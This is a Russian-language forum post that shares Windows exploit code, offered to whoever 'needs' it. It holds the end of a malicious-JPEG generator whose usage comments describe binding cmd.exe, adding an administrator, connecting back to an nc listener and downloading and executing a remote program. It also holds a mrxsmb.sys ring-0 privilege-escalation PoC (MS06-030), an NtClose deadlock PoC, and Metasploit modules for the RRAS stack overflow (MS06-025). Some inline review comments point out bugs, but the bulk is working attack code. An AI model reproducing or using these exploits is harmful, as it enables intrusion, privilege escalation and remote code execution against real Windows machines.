if( 0xD9FF == *(unsigned short *)&shellcode4[i] ) 
printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n");

printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode4)-1);

// Same file layout as mode 1 (see the comments there).
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode4[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
WSACleanup();
}

// download from http and execute
if (atoi(argv[1]) == 5) 
{
 show();
         mkdir("Crypto");
 fout=fopen("Crypto\\Crypto5.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}

// strcat() appends argv[2] and a 0x01 byte into the global shellcode5[],
// which is sized exactly to its initializer: any URL at all writes past
// the end of the array (memory corruption inside this tool itself).
// sizeof(shellcode5) below is the compile-time size, not the grown length.
strcat(shellcode5,argv[2]);
        strcat(shellcode5,"\x01");


for(i=0;i<sizeof(shellcode5)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode5[i] ) 
printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");


printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode5)-1);

// Same file layout as mode 1 (see the comments there).
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode5[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
}

// Unknown mode numbers fall through here silently with status 0.
return 0;
}

// You have read till here ? :)
// Well, the code was deliberately not optimized, so others could add more shellcodes
// with an easy copy+paste :)
// OK some examples here:
//D:\C++\Debug>sacred_jpg.exe 1 [it will pop up cmd.exe]
//D:\C++\Debug>sacred_jpg.exe 2 8081 [it will bind cmd.exe on port 8081]
//D:\C++\Debug>sacred_jpg.exe 3 [it will add user "ASP32.NET" as an administrator]
//D:\C++\Debug>sacred_jpg.exe 4 192.168.0.1 31337
//[it will connect to 192.168.0.1 on port 31337, where of course nc is listening :), nc -l -p 31337]
//D:\C++\Debug>sacred_jpg.exe 5 [url=http://yourserver.com/progam.exe]http://yourserver.com/progam.exe[/url] [it will download and then execute program.exe]
//by the way you can compile source code with VC++ 6.0
 
Вот парочка сплоитов под винду, может кому надо. +)
MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)
Эксплоит:
Код:
///////////////////////////////////////////////////////////////////////////////////////
// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4 
// Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES.
// -----------------------------------------------------------------------------------
// Rubén Santamarta.
// www.reversemode.com
// -----------------------------------------------------------------------------------
// OVERVIEW
// -----------------------------------------------------------------------------------
// There are 3 possible values to change in order to adjust the exploit to other versions.
// # XPSP2 (XP Service Pack 2)
// This variable is equal to the File offset of the Call that we are modifying minus 0xC
//. #XPSP2 => 3D88020000                   cmp         eax,000000288
//.           770B                         ja         .000064BBE  --
//.           50                           push        eax
//.           51                           push        ecx
//.           E812E2FFFF                   call       .000062DCC  -- MODIFIED CALL --
// -----------------------------------------------------------------------------------
// #W2KSP4 (Windows 2000 Service Pack 4)
// The same method as explained above, but for Windows 2000 Service Pack 4.
// -----------------------------------------------------------------------------------
// $OffWord
// This variable is defined in CalcJump() Function. 
// E812E2FFFF  call       .000062DCC  -- MODIFIED CALL -- 
// The exploit calculates automatically the relative jump, but we need to provide it
// the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP
// OffWord will be equal to 0xE212.
//////////////////////////////////////////////////////////////////////////////////////



#include <windows.h>
#include <stdio.h>


// Per the OVERVIEW above: file offset of the mrxsmb.sys call being patched,
// minus 0xC, for each tested build. main() adds the driver's load address
// at run time (Ring0Addr = BaseMRX + XPSP2 / W2KSP4); CalcJump() adds a
// further 0xE. MAGIC_IOCTL is the \\.\shadow control code every
// DeviceIoControl() in this file sends.
#define XPSP2  0x54BAC  
#define W2KSP4  0x50ADD
#define MAGIC_IOCTL 0x141043

// Function-pointer types for the two psapi.dll exports that main() resolves
// at run time with GetProcAddress (EnumDeviceDrivers and
// GetDeviceDriverBaseNameA) instead of linking against psapi.lib.
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
        	DWORD ,
        	LPDWORD);

typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
        	LPTSTR lpBaseName,
        	DWORD nSize);

/*
 * Look up the text of the calling thread's last Win32 error, show it in a
 * modal message box titled "Error", and terminate the process with status 1.
 * Never returns. The buffer that FormatMessage allocates is not released,
 * since exit() follows immediately.
 */
VOID ShowError()
{
	DWORD code = GetLastError();
	LPTSTR text = NULL;
	DWORD flags = FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM;

	FormatMessage(flags,
	              NULL,
	              code,
	              MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
	              (LPTSTR)&text,
	              0,
	              NULL);
	MessageBoxA(0, text, "Error", 0);
	exit(1);
}

/*
 * Works out where the patched call inside mrxsmb.sys will land and which
 * user-mode page must therefore be backed.
 *   BaseMRX   - load address of mrxsmb.sys (found by main()).
 *   InXP      - TRUE selects the XPSP2 offset / OffWord pair, else W2KSP4.
 *   hValue    - out: loop counter (minus 4) at which the search matched;
 *               main() uses it as the stop value for its IOCTL loop.
 *   ShellAddr - out: the address the patched call will point to.
 * Returns that address rounded down to a page (& 0xFFFFF000); main()
 * passes it to VirtualAlloc().
 *
 * Reviewer notes: IniAddress and addTemp are assigned only inside the `if`
 * in the loop, so if no i in [0x4c, 0xDDDC) satisfies the window test the
 * function prints and returns indeterminate values -- undefined behaviour
 * in C, and the caller has no way to learn that the search failed. OffWord
 * is the 2 bytes following the E8 opcode described in the OVERVIEW, so
 * both constants are build-specific. The final printf passes a DWORD to
 * "%p" (format/argument mismatch).
 */
DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{

      DWORD SumTemp;
      DWORD IniAddress;
   DWORD i;
   DWORD sumAux;
   DWORD addTemp;
   DWORD OffWord;
   
   if(InXP)
   {
  SumTemp=BaseMRX+XPSP2+0xE;
     OffWord=0xE212;
   }
   else
   {
     SumTemp=BaseMRX+W2KSP4+0xE;
  OffWord=0xa971;
   }
  
	
   // Step i by 4 and take the first candidate whose target falls strictly
   // between 0xE000000 and 0xF000000.
   for(i=0x4c;i<0xDDDC;i=i+4)
   {   
  // high 16 bits from the counter, low 16 from the build-specific OffWord
  sumAux=~((i*0x10000)+OffWord);
  addTemp=SumTemp-sumAux;
  if(addTemp>0xE000000 && addTemp<0xF000000){
    IniAddress=addTemp&0xFFFFF000;
    *hValue=i-4;
    *ShellAddr=addTemp;
    break;
  }
   }
   printf("\nINFORMATION \n");
   printf("-----------------------------------------------------\n");
      printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp);
   
      return (IniAddress);
} 

/*
 * Driver of the PoC; everything happens in this one function:
 *   1. argv[1] equal to "XP" selects the XPSP2 constants, anything else W2KSP4.
 *   2. Resolve EnumDeviceDrivers / GetDeviceDriverBaseNameA from psapi.dll
 *      and scan the loaded-driver list for a base name starting with
 *      "mrxsmb" to learn the driver's load address (BaseMRX).
 *   3. CalcJump() turns that into the user-mode page the patched call will
 *      land on; VirtualAlloc() commits 0xF000 RWX bytes there.
 *   4. Open \\.\shadow, repeat MAGIC_IOCTL until OutBuff[3] reaches hValue,
 *      issue it once more with the driver address as the output buffer,
 *      fill the user page with 0x90 plus the one-byte Ring0ShellCode
 *      placeholder (0xCC = int3), then send the IOCTL a final time.
 * Exit status is 1 on every path, success included.
 *
 * Reviewer notes (what is observable / what is fragile):
 *  - The file header states the PoC requires EnforceWriteProtection=0 under
 *    Session Manager\Memory Management, i.e. a machine already reconfigured
 *    with administrative rights. With the placeholder payload the outcome is
 *    an int3 executed in ring 0 -- presumably a bugcheck unless a kernel
 *    debugger is attached -- not a shell.
 *  - A user-mode process opening \\.\shadow with FILE_EXECUTE and sending
 *    control code 0x141043 in a tight loop is the behaviour a monitor sees.
 *  - Nothing is checked: LoadLibrary/GetProcAddress may return NULL, the
 *    result of pEnumDeviceDrivers and cb vs. sizeof(arrMods) are ignored,
 *    the driver loop runs from 1 to devNum inclusive (skips entry 0 and
 *    reads one element past the last valid one), every DeviceIoControl
 *    result is discarded.
 *  - "%x" and "%p" are mixed freely with pointer and DWORD arguments.
 */
int main(int argc, char *argv[])
{
 PENUMDEVICES pEnumDeviceDrivers;
 PGETDEVNAME  pGetDeviceDriverBaseName;
 LPVOID arrMods[200],addEx;
 DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0;
 DWORD *OutBuff,*InBuff;
 HANDLE hDevice;
 BOOL InXP;
 CHAR baseName[255];

 // Placeholder ring-0 payload: a single int3. sizeof() below is 2 (with NUL).
 CONST CHAR Ring0ShellCode[]="\xCC";       //"PUT YOUR RING0 CODE HERE :)"
 
 if(argc<2)
 {
  printf("\nMRXSMB.SYS RING0 Exploit\n");
  printf("--- Ruben Santamarta ---\n");
  printf("Tested on XPSP2 & W2KSP4\n");
  printf("\nusage> exploit.exe <XP> or <2K>\n");
  exit(1);
 }
 
 // Only the first two characters are compared; anything but "XP" means 2K.
 if(strncmp(argv[1],"XP",2)==0)
  InXP=TRUE;
 else
  InXP=FALSE;

 // psapi.dll is loaded twice and neither handle is released; the returned
 // function pointers are used without a NULL check.
 pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
             "EnumDeviceDrivers");

 pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
             "GetDeviceDriverBaseNameA");

 // cb may exceed sizeof(arrMods) (200 entries); that case is not handled.
 pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
 devNum=cb/sizeof(LPVOID);
 printf("\nSearching Mrxsmb.sys Base Address...");

 // Off by one at both ends: starts at 1, ends at devNum inclusive.
 for(i=1;i<=devNum;i++)
 {
       pGetDeviceDriverBaseName(arrMods[i],baseName,254);
    if((strncmp(baseName,"mrxsmb",6)==0))
    {
       printf("[%x] Found!\n",arrMods[i]);
     BaseMRX=(DWORD)arrMods[i];
    }
 }

 if(!BaseMRX)
 {
  printf("Not Found\nExiting\n\n");
  exit(1);
 }

 // CalcJump() returns the page-aligned address; hValue/ShellAddr come back
 // through the out-parameters (indeterminate if its search found nothing).
 addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr);
 OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 
 if(!OutBuff) ShowError();

 printf("F000h bytes allocated  at \t\t [0x%p]\n",addEx);
 printf("Value needed   \t\t\t  [0x%p]\n",hValue+4);

 // The same allocation doubles as input and output buffer for the IOCTLs.
 InBuff=OutBuff;
 
 printf("Checking Shadow Device...");
 hDevice = CreateFile("\\\\.\\shadow",
                    FILE_EXECUTE,
                    FILE_SHARE_READ|FILE_SHARE_WRITE,
                    NULL,
                    OPEN_EXISTING,
                    0,
                    NULL);
  
 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 printf("[OK]\n");
 
 printf("Querying Device...\n");

 // Loops until the driver-written value at OutBuff[3] reaches hValue; if
 // the driver never advances it this loop does not terminate.
 while(OutBuff[3]< hValue)
  {
  	DeviceIoControl(hDevice,      // "\\.\shadow"
                            MAGIC_IOCTL,  // Privileged IOCTL
                            InBuff, 2,    // InBuffer, InBufferSize
                            OutBuff, 0x18,// OutBuffer,OutBufferSize
                            &junk,        // bytes returned
                            (LPOVERLAPPED) NULL);
  
  printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
  }

  if(InXP)
   Ring0Addr=BaseMRX+XPSP2;
  else
   Ring0Addr=BaseMRX+W2KSP4; 
  
  // This call's output buffer is the driver's own code address.
  printf("Overwritting Driver Call at[%x]...",Ring0Addr);
  DeviceIoControl(hDevice,      // "\\.\shadow"
                            MAGIC_IOCTL,  // Privileged IOCTL
                            InBuff, 2,    // InBuffer, InBufferSize
                            (LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
                            &junk,        // bytes returned
                            (LPOVERLAPPED) NULL);
  
  printf("[OK]\n");
  // 0x3C00 DWORDs = 0xF000 bytes, i.e. the whole allocation, starting at
  // index 1 so OutBuff[0] keeps whatever the driver left there.
  for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090;
  
  // Copies the 2-byte array (0xCC plus NUL) to ShellAddr, which lies inside
  // the allocation by construction of CalcJump().
  memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode));
 
  
  printf("Sending IOCTL to execute the ShellCode\n");
  
  DeviceIoControl(hDevice,      // "\\.\shadow"
                            MAGIC_IOCTL,  // Privileged IOCTL
                            InBuff, 2,    // InBuffer, InBufferSize
                            OutBuff, 0x18,// OutBuffer,OutBufferSize
                            &junk,        // bytes returned
                            (LPOVERLAPPED) NULL);

  dwTemp=CloseHandle(hDevice);
  if(!dwTemp) ShowError();

  // MEM_DECOMMIT only: the reservation itself is never released.
  dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT);
  if(!dwTemp) ShowError();

  // Non-zero exit status even on the success path.
  return(1);
}
====================================================
и второй сплоит:
MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030)
Эксплоит:
Код:
////////////////////////////////////////////////////////////////////////////////
///////// MRXSMB.SYS NtClose DEADLOCK exploit///////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//November 19,2005
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//ONLY FOR EDUCATION PURPOSES
////////////////////////////////////////////////////////////////////////////////
// Rubén Santamarta 
// ruben (at) reversemode (dot) com
// http://www.reversemode.com
////////////////////////////////////////////////////////////////////////////////

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>


#define MAGIC_IOCTL 0x141047


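/*
 * Report the calling thread's last Win32 error in a message box and exit.
 *
 * Never returns: the process terminates with exit status 1.
 * The original passed lpMsgBuf to MessageBoxA without checking whether
 * FormatMessage had actually filled it; on failure that pointer was
 * uninitialized. Here the buffer starts as NULL, a failed lookup falls back
 * to the numeric code, and the system-allocated text is released.
 */
VOID ShowError()
{
 LPVOID lpMsgBuf = NULL;
 DWORD dwErr = GetLastError();   /* capture first: later calls may overwrite it */
 DWORD dwLen;

 dwLen = FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
                       NULL,
                       dwErr,
                       MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
                       (LPTSTR) &lpMsgBuf,
                       0,
                       NULL);

 if (dwLen == 0 || lpMsgBuf == NULL)
 {
  /* No system text for this code: show the raw value instead of garbage. */
  char szFallback[64];
  snprintf(szFallback, sizeof szFallback, "Error code 0x%08lx", (unsigned long)dwErr);
  MessageBoxA(0, szFallback, "Error", 0);
 }
 else
 {
  MessageBoxA(0, (LPTSTR)lpMsgBuf, "Error", 0);
  LocalFree(lpMsgBuf);   /* FORMAT_MESSAGE_ALLOCATE_BUFFER storage is LocalAlloc'ed */
 }

 exit(1);
}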


/*
 * Keep-alive worker: once a second, rewrite the console line with an
 * incrementing counter so the operator can see the thread is still being
 * scheduled. Gives up after 0x1000 iterations.
 */
VOID IamAlive()
{
 DWORD tick = 0;

 while (tick < 0x1000)
 {
  Sleep(1000);
  printf("\rI am a Thread and I am alive [%x]", tick);
  tick++;
 }
}


/*
 * Open the "\\.\shadow" device, store the device handle itself in the fourth
 * DWORD of the output buffer and issue MAGIC_IOCTL against it. Per the
 * trailing comment and the caller's messages, this call is presumably not
 * expected to return, which is why nothing after DeviceIoControl (free,
 * CloseHandle) is ever done.
 *
 * Review notes (code left as found):
 *  - OutBuff is 0x18 bytes from malloc; only OutBuff[3] is written, the other
 *    five DWORDs are passed to the driver uninitialized, and the block is
 *    never freed.
 *  - junk receives the byte count but is never read.
 *  - InBuff, bResult and i are declared but unused; the IOCTL is sent with
 *    no input buffer (0, 0).
 *  - The DeviceIoControl return value is not checked.
 */
VOID KillMySelf()
{
     
 DWORD junk;
 DWORD *OutBuff;
 DWORD *InBuff;
 BOOL bResult;
 HANDLE hDevice;
 DWORD i;
 
  /* FILE_EXECUTE access with read/write sharing; failure exits via ShowError. */
  hDevice = CreateFile("\\\\.\\shadow", FILE_EXECUTE,FILE_SHARE_READ|FILE_SHARE_WRITE,
                      NULL, OPEN_EXISTING, 0, NULL);
                      
  if (hDevice == INVALID_HANDLE_VALUE) ShowError();
  
  OutBuff=(DWORD*)malloc(0x18);
  if(!OutBuff) ShowError();
  
  /* The handle being used for the request is placed inside the request's own output buffer. */
  OutBuff[3]=(DWORD)hDevice;
  
  DeviceIoControl(hDevice,
                  MAGIC_IOCTL,
                  0,0,
                  OutBuff,0x18,
                  &junk,
                  (LPOVERLAPPED)NULL);
  // MAIN THREAD ENDING.
}


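/*
 * Entry point: start the keep-alive thread, then have the main thread call
 * KillMySelf(), which (per the comment there) is not expected to return.
 *
 * argc/argv are unused. Returns 1 only if KillMySelf() does return.
 * Compared with the original: a failed CreateThread is now reported instead
 * of ignored, the thread handle is released, and the unused bResult is gone.
 */
int main(int argc, char *argv[])
{
 LPTHREAD_START_ROUTINE GoodThread = (LPTHREAD_START_ROUTINE)IamAlive;
 DWORD dwThreadId;
 HANDLE hThread;

 (void)argc;
 (void)argv;

  printf("-=[MRXSMB.SYS NtClose Vulnerability POC]=-\n");
  printf("\t(Only for educational purposes)\n");
  printf("..http://www.reversemode.com..\n\n");
  printf("Launching Thread ...");

  // PUT YOUR "GOOD" OR "BAD" CODE HERE
  // e.g GoodThread
  /* NOTE(review): IamAlive is declared VOID() while LPTHREAD_START_ROUTINE is
   * DWORD WINAPI (LPVOID); the cast silences that mismatch rather than fixing it. */
  hThread = CreateThread(NULL, 0, GoodThread, 0, 0, &dwThreadId);
  if (hThread == NULL) ShowError();   /* the original ignored a failed CreateThread */
  CloseHandle(hThread);               /* the thread keeps running; only our handle is released */

  printf("Done\n");
  printf("I am going to dissapear,but I will be with you forever\n");
  printf("(..)\n\n");
  KillMySelf(); // Immortal mode "on";)

  return(1);
}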
 
MS Windows RRAS Remote Stack Overflow Exploit (MS06-025)
Код:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

# Advanced (tunable) options, each as [ default value, description ];
# Exploit() reads them back with GetVar().
my $advanced = {
'FragSize'    => [ 256, 'The DCERPC fragment size' ],
'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

# Module metadata handed to the Msf::Exploit base class by new().
my $info = {
# NOTE(review): 'MSO6-025' is written with a letter O here; the 'Refs' entry
# below spells the bulletin MS06-025.
'Name'    => 'Microsoft RRAS MSO6-025 Stack Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => 
[ 
'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
'H D Moore <hdm [at] metasploit.com>'
],

'Arch' => ['x86'],
'OS'   => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 1,

'AutoOpts' => { 'EXITFUNC' => 'thread' },
# User options: [ required?, type, description, default ].
'UserOpts' => {
'RHOST' => [ 1, 'ADDR', 'The target address' ],

# SMB connection options
'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
  },

'Payload' => {
'Space'    => 1104,
'BadChars' => "\x00",
'Keys'     => ['+ws2ord'],

# sub esp, 4097 + inc esp makes stack happy
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
  },

'Description' => Pex::Text::Freeform(
qq{
        This module exploits a stack overflow in the Windows Routing and Remote
Access Service. Since the service is hosted inside svchost.exe, a failed 
exploit attempt can cause other system services to fail as well. A valid
username and password is required to exploit this flaw on Windows 2000. 
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
}
  ),

'Refs' =>
  [
[ 'BID', '18325' ],
[ 'CVE', '2006-2370' ],
[ 'OSVDB', '26437' ],
[ 'MSB', 'MS06-025' ]
  ],

'DefaultTarget' => 0,
# [ label, address ]: index 0 ('Automatic') is replaced in Exploit() by index
# 1 or 2 according to the OS string the SMB peer reports; the address in the
# other entries is specific to that OS build (see the trailing comments).
'Targets'       =>
  [
[ 'Automatic' ],
[ 'Windows 2000',   0x7571c1e4 ], # pop/pop/ret
[ 'Windows XP SP1', 0x7248d4cc ], # pop/pop/ret
  ],

'Keys' => ['rras'],

'DisclosureDate' => 'Jun 13 2006',
  };

# Constructor: hand the module metadata and advanced options to the
# Msf::Exploit base class. @_ is forwarded untouched, so it still carries the
# invocant as its first element exactly as in the original call.
sub new {
my ($class) = @_;
return $class->SUPER::new( { Advanced => $advanced, Info => $info }, @_ );
}

# Bind to the RRAS endpoint over the configured SMB pipe, resolve the
# 'Automatic' target from the OS string the SMB peer reports, and send a
# single opnum 0x0C request whose stub carries the per-target pattern.
# Returns nothing; all progress and errors go through $self->PrintLine.
#
# Review notes (code left as found):
#  - $target is declared with 'my' twice (here and a few lines below); the
#    second declaration masks the first and warns under -w.
#  - $target_port, $FragSize, $res and $rpc are set or declared but never used.
#  - In the final else branch, 'self->PrintLine' is missing the '$' sigil:
#    Perl takes 'self' for a package name and the call dies at runtime instead
#    of printing. That branch is reached only when neither regex matched.
sub Exploit {
my ($self)      = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx  = $self->GetVar('TARGET');
my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
my $target      = $self->Targets->[$target_idx];

my $FragSize = $self->GetVar('FragSize') || 256;
my $target   = $self->Targets->[$target_idx];   # second 'my $target' (see notes above)

my ( $res, $rpc );

if ( !$self->InitNops(128) ) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}

my $pipe    = "\\" . $self->GetVar("SMBPIPE");
my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
my $version = '1.0';

my $handle =
  Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
$pipe );

# SMB credentials and the advanced options all come from GetVar().
my $dce = Pex::DCERPC->new(
'handle'      => $handle,
'username'    => $self->GetVar('SMBUSER'),
'password'    => $self->GetVar('SMBPASS'),
'domain'      => $self->GetVar('SMBDOM'),
'fragsize'    => $self->GetVar('FragSize'),
'bindevasion' => $self->GetVar('BindEvasion'),
'directsmb'   => $self->GetVar('DirectSMB'),
  );

if ( !$dce ) {
$self->PrintLine("[*] Could not bind to $handle");
return;
}

# 'Automatic' is resolved from the native-OS string the SMB peer advertised.
my $smb = $dce->{'_handles'}{$handle}{'connection'};
if ( $target->[0] =~ /Auto/ ) {
if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
$target = $self->Targets->[1];
$self->PrintLine('[*] Detected a Windows 2000 target...');
}
elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
$target = $self->Targets->[2];
$self->PrintLine('[*] Detected a Windows XP target...');
}
else {
$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
return;
}
}

my $pattern = '';

if ($target->[0] =~ /Windows 2000/) {

$pattern =
  pack( 'V', 1 ) .
  pack( 'V', 0x49 ) .
  $shellcode .
  "\xeb\x06" .
  Pex::Text::AlphaNumText(2).
  pack( 'V', $target->[1] ) .
  "\xe9\xb7\xfb\xff\xff";

} elsif( $target->[0] =~ /Windows XP/) {

$pattern =
  pack( 'V', 1 ) .
  pack( 'V', 0x49 ) .
  Pex::Text::AlphaNumText(0x4c).
  "\xeb\x06" .
  Pex::Text::AlphaNumText(2).
  pack( 'V', $target->[1] ) .
  $shellcode;

} else {
# NOTE(review): missing '$' before 'self' - this line dies rather than prints.
self->PrintLine( '[*] No target available...');
return;
}

# need to produce an exception
my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern));

my $len = length ($request);

my $stub =
  Pex::NDR::Long( int( 0x20000 ) )
  . Pex::NDR::Long( int( $len ) )
  . $request
  . Pex::NDR::Long( int( $len ) );

$self->PrintLine("[*] Sending request...");
my @response = $dce->request( $handle, 0x0C, $stub );
# Any reply is printed and read as "the request was handled normally".
if (@response) {
$self->PrintLine('[*] RPC server responded with:');
foreach my $line (@response) {
$self->PrintLine( '[*] ' . $line );
}
$self->PrintLine('[*] This probably means that the system is patched');
}
return;
}

1;
greetzzz: H D Moore
 
Новая версия предыдущего эксплоита для всё той же уязвимости
Код:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025_rasman;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::SMB;
use Pex::NDR;

# Advanced (tunable) options, each as [ default value, description ];
# Exploit() reads them back with GetVar().
my $advanced = {
	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
	'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

# Module metadata handed to the Msf::Exploit base class by new().
my $info = {
	# NOTE(review): 'MSO6-025' is written with a letter O here; the 'Refs'
	# entry below spells the bulletin MS06-025.
	'Name'    => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow',
	'Version' => '$Revision: 1.1 $',
	'Authors' =>
   [
  'Pusscat <pusscat [at] gmail.com>',
  'H D Moore <hdm [at] metasploit.com>'
   ],

	'Arch' => ['x86'],
	'OS'   => [ 'win32', 'win2000', 'winxp' ],
	'Priv' => 1,

	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	# User options: [ required?, type, description, default ].
	'UserOpts' =>
   {
  'RHOST' => [ 1, 'ADDR', 'The target address' ],

  # SMB connection options
  'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
  'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
  'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
  'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
   },

	'Payload' =>
   {
  'Space'    =>1024,
  'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",

  # sub esp, 4097 + inc esp makes stack happy
  'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
   },

	'Description' => Pex::Text::Freeform(
  qq{
      This module exploits a registry-based stack overflow in the Windows Routing 
  	and Remote Access Service. Since the service is hosted inside svchost.exe, 
  	a failed exploit attempt can cause other system services to fail as well. 
  	A valid username and password is required to exploit this flaw on Windows 2000. 
  	When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
  	Exploiting this flaw involves two distinct steps - creating the registry key
  	and then triggering an overwrite based on a read of this key. Once the key is
  	created, it cannot be recreated. This means that for any given system, you
  	only get one chance to exploit this flaw. Picking the wrong target will require
  	a manual removal of the following registry key before you can try again:
  	HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
}
   ),

	'Refs' =>
   [
  [ 'BID', '18325' ],
  [ 'CVE', '2006-2370' ],
  [ 'OSVDB', '26437' ],
  [ 'MSB', 'MS06-025' ]
   ],

	'DefaultTarget' => 0,
	# [ label, address ]: index 0 ('Automatic') is replaced in Exploit() by
	# index 1 when the SMB peer reports 'Windows 5.0'.
	# NOTE(review): only Windows 2000 is listed, while 'Description' above
	# still tells the operator how to set SMBPIPE for XP SP1; the XP branch of
	# the auto-detection in Exploit() is commented out.
	'Targets'       =>
   [
  [ 'Automatic' ],
